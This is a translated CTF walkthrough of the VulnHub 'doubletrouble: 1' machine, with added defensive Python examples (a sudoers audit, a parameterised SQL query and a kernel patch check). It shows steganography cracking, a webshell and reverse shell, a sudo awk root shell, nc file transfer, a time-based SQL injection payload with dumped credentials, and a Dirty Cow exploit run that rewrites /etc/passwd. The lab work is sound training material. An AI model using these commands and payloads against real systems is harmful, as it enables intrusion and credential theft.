
vulnhub刷题记录(doubletrouble: 1)

author:AILX10
  • English name: doubletrouble: 1
  • Chinese name: Double troubles: 1
  • Published date: September 11, 2021
  • Difficulty: Easy
  • Description: About the VM: tested and exported from VirtualBox. Enable DHCP and nested VT-x/AMD-V. You can contact me via email for troubleshooting or questions.
  • Download: https://www.vulnhub.com/entry/empire-breakout,751/

1. Host discovery (192.168.199.107)

[Screenshot: host discovery]

2. Port scanning: ports 22 and 80 are open

[Screenshot: port scanning]

3. Visit the web page

[Screenshot: the web page]

4. Check the web components for known vulnerabilities

[Screenshot: web component vulnerabilities]

5. Enumerate web directories

┌──(ailx10㉿kali)-[~]
└─$ dirb http://192.168.199.107/       

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 21 17:50:02 2022
URL_BASE: http://192.168.199.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

+ http://192.168.199.107/favicon.ico (CODE:200|SIZE:894)
+ http://192.168.199.107/index.php (CODE:200|SIZE:5816)
+ http://192.168.199.107/robots.txt (CODE:200|SIZE:26)
+ http://192.168.199.107/server-status (CODE:403|SIZE:280)
+ http://192.168.199.107/install/index.php (CODE:200|SIZE:1815)
==> DIRECTORY: http://192.168.199.107/uploads/
==> DIRECTORY: http://192.168.199.107/backups/
==> DIRECTORY: http://192.168.199.107/secret/
...
-----------------
END_TIME: Sun Aug 21 17:50:11 2022
DOWNLOADED: 9224 - FOUND: 5

6. Find a secret file

[Screenshot: the clue]

7. Try to extract the embedded information from the image

steghide info doubletrouble.jpg           
[Screenshot: trying to extract the embedded information from the picture]

8. Use Stegseek to crack Steghide steganography data[1]

Stegseek is by far the fastest Steghide cracker available; it can test millions of passwords per second.

Notably, it can run through the whole rockyou.txt wordlist in about two seconds.

rockyou.txt is the well-known wordlist of more than 14 million leaked passwords.

┌──(root㉿kali)-[/home/ailx10/002]
└─# wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# apt install ./stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt            


[Screenshot: password found in seconds: 92camaro]

9. Extract the embedded data from the picture again; it contains an email address and a password

┌──(root㉿kali)-[/home/ailx10/002]
└─# steghide info doubletrouble.jpg
┌──(root㉿kali)-[/home/ailx10/002]
└─# cat doubletrouble.jpg.out 
[email protected]
otis666           
[Screenshot: the web administrator password]

10. Log in to the web admin panel and add the user ailx10

[Screenshot: user ailx10 added]

11. Switch to the new account, create a project, and upload a webshell

[Screenshot: uploading the webshell]

12. Reverse shell

[Screenshot: reverse shell]

13. Check sudo -l and find that awk can be run as root without a password

[Screenshot: escalating to root]

14. After escalating to root, I found another target machine inside this one: it really is a nested target

sudo awk 'BEGIN {system("/bin/sh")}'           
[Screenshot: meeting the nested target]
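A defender's counterpart to steps 13 and 14, added here as an example (not code from the original post): a small audit that flags sudoers rules granting NOPASSWD on binaries known to spawn a shell, such as the awk rule this machine had. The sudoers text, user names and the helper names are constructed for the example.

```python
import re

# Binaries that can spawn a shell when run through sudo; awk is the one this machine allowed.
SHELL_ESCAPE_BINARIES = {"awk", "gawk", "mawk", "vi", "vim", "nano", "less", "more", "man",
                         "find", "env", "python", "python3", "perl", "bash", "sh"}

# Constructed sudoers sample in the shape of /etc/sudoers; not the target's real file.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/awk          # the weak rule from this box
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/find
deploy   ALL=(ALL) /usr/bin/systemctl restart app
"""

# user  host=(runas) [tags:] commands
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")

def audit_sudoers(text):
    """Return (user, binary) pairs that may run a shell-escape binary as another user
    without a password. 'ALL' is reported too, since it covers every binary."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        m = RULE_RE.match(line)
        if not m or "NOPASSWD:" not in m.group("cmds"):
            continue
        # Only the commands after the NOPASSWD: tag are password-free.
        cmd_spec = m.group("cmds").split("NOPASSWD:", 1)[1]
        for cmd in cmd_spec.split(","):
            parts = cmd.split()
            if not parts:
                continue
            binary = parts[0].rsplit("/", 1)[-1]     # /usr/bin/awk -> awk
            if binary == "ALL" or binary in SHELL_ESCAPE_BINARIES:
                findings.append((m.group("who"), binary))
    return findings

if __name__ == "__main__":
    for user, binary in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: NOPASSWD on {binary} can become a root shell; require a password or restrict arguments")
```

Run it against the output of `sudo -l` or a copy of /etc/sudoers and sudoers.d files; every hit is a rule that should either require a password or be narrowed to a fixed argument list.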

15. Transfer the OVA to the local machine with nc

Server side (local machine):
nc -lvp 4444 > ailx10_double_trouble.ova

Client side (target):
nc 192.168.199.247 4444 < doubletrouble.ova
[Screenshot: downloading the second OVA]

16. Boot the second target machine and repeat the process

[Screenshot: the second target machine]

17. Host discovery finds one more IP: 192.168.199.171

[Screenshot: the new IP address, 192.168.199.171]

18. Port scanning: ports 22 and 80 are open

[Screenshot: port scanning]

19. Visit the web page

[Screenshot: the web page]

20. Test the login form for SQL injection with sqlmap

---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe&psw=123456&btnLogin=Login
---           
[Screenshot: the SQL injection vulnerability]

21. Try to get the database name (doubletrouble)

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" --current-db           
[Screenshot: the database name]

22. Try to get the table name (users)

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble --tables           
[Screenshot: the table name]

23. Try to get the column names (username, password)

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users --columns           
[Screenshot: the column names]

24. Try to get the contents of the fields in the table

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users -C username,password --dump

Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1  |
| clapton  | ZubZub99 |
+----------+----------+           
[Screenshot: the column contents]
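The login query behind steps 20 to 24, added here as an example (not the target's PHP source): a string-built query beside its parameterised version, each fed the exact uname payload sqlmap reported. SQLite stands in for MySQL, so the injected SLEEP() subquery surfaces as a "no such function" error instead of a 5-second delay, which is enough to show that the attacker's text reached the SQL parser; the users rows and function names are constructed for the example.

```python
import sqlite3

# Constructed sample: the time-based blind payload sqlmap reported for the uname field
# in the walkthrough above (MySQL syntax; the psw field stays as 123456).
INJECTED_UNAME = "ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe"

def make_db():
    """In-memory stand-in for the target's users table (constructed rows, not the real ones)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db

def vulnerable_login(db, uname, psw):
    """String-built query: whatever the client sends becomes part of the SQL text."""
    sql = f"SELECT username FROM users WHERE username='{uname}' AND password='{psw}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def safe_login(db, uname, psw):
    """Parameterised query: the input is bound as a value and cannot change the statement."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (uname, psw)).fetchone()
    return row[0] if row else None

def injected_text_reached_parser(db, uname, psw):
    """True if the SQL engine tried to run the attacker's text. SQLite has no SLEEP(),
    so the injected subquery fails with 'no such function: SLEEP'; MySQL would sleep 5 s."""
    try:
        vulnerable_login(db, uname, psw)
    except sqlite3.OperationalError as exc:
        return "SLEEP" in str(exc)
    return False

if __name__ == "__main__":
    db = make_db()
    print("vulnerable query parsed the injected SQL:",
          injected_text_reached_parser(db, INJECTED_UNAME, "123456"))
    print("safe query result for the same input:", safe_login(db, INJECTED_UNAME, "123456"))
    print("safe query result for a real user:", safe_login(db, "alice", "s3cret"))
```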

25. Log in over SSH with the recovered credentials and read the user flag

[Screenshot: SSH login and the user flag]

26. Gather system information and look for a privilege escalation vulnerability

[Screenshot: system information]

[Screenshot: privilege escalation PoC]

27. Compiling 45010 fails because a required file is missing, so fall back to Dirty Cow[2]

The Dirty Cow vulnerability (CVE-2016-5195) affects Linux kernels older than the following distribution kernels, which carry the fix:
Centos7/RHEL7     3.10.0-327.36.3.el7
Centos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10      4.8.0-26.28
Ubuntu 16.04      4.4.0-45.66
Ubuntu 14.04      3.13.0-100.147
Debian 8          3.16.36-1+deb8u2
Debian 7          3.2.82-1

Specifically, the bug is a race condition in the kernel's get_user_page function while it handles copy-on-write (COW): the COW step can be broken, which gives a process the chance to write into read-only mappings in its own address space.

Writing into a privileged file such as the su or passwd binary, or /etc/passwd as the PoC below does, is enough to obtain root.

clapton@doubletrouble:~$ ls
45010.c  dirty.c  user.txt
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$ ls
45010.c  dirty	dirty.c  user.txt
clapton@doubletrouble:~$ ./dirty ailx10
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: ailx10
Complete line:
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash

mmap: 7f49735fb000           
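Added example (not from the post or the Dirty Cow repository): an exposure check that compares a distribution kernel version against the fixed versions listed in step 27, using that table as its data. The function names and the version strings in the usage are constructed; the table values are the page's.

```python
import re

# Distribution kernels that carry the Dirty Cow (CVE-2016-5195) fix, as listed above.
FIXED_KERNELS = {
    "centos7/rhel7": "3.10.0-327.36.3.el7",
    "centos6/rhel6": "2.6.32-642.6.2.el6",
    "ubuntu 16.10":  "4.8.0-26.28",
    "ubuntu 16.04":  "4.4.0-45.66",
    "ubuntu 14.04":  "3.13.0-100.147",
    "debian 8":      "3.16.36-1+deb8u2",
    "debian 7":      "3.2.82-1",
}

def version_key(version):
    """Turn '3.16.36-1+deb8u2' into (3, 16, 36, 1, 8, 2) so two versions of the same
    distro compare numerically; the letters ('el', 'deb', 'u') only separate the numbers."""
    return tuple(int(n) for n in re.findall(r"\d+", version))

def is_patched(distro, running):
    """True if `running` is at or above the fixed kernel for `distro`.
    Compare the package version, not `uname -r`: Ubuntu's uname prints 4.4.0-45-generic,
    while the linux-image package version (the form in the table) is 4.4.0-45.66."""
    fixed = FIXED_KERNELS[distro.lower()]
    r, f = version_key(running), version_key(fixed)
    width = max(len(r), len(f))                      # pad shorter tuple with zeros
    return r + (0,) * (width - len(r)) >= f + (0,) * (width - len(f))

if __name__ == "__main__":
    # Constructed version strings for demonstration.
    for distro, running in [("Debian 8", "3.16.36-1+deb8u1"), ("Ubuntu 16.04", "4.4.0-47.68")]:
        state = "patched" if is_patched(distro, running) else "VULNERABLE"
        print(f"{distro} {running}: {state} (fix: {FIXED_KERNELS[distro.lower()]})")
```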

28. Escalate privileges and read the root flag

[Screenshot: the root flag]

At this point, the experiment is complete~

References

  1. stegseek: https://github.com/RickdeJager/stegseek/releases
  2. Dirty Cow: https://github.com/firefart/dirtycow

Edited on 2022-08-21 21:08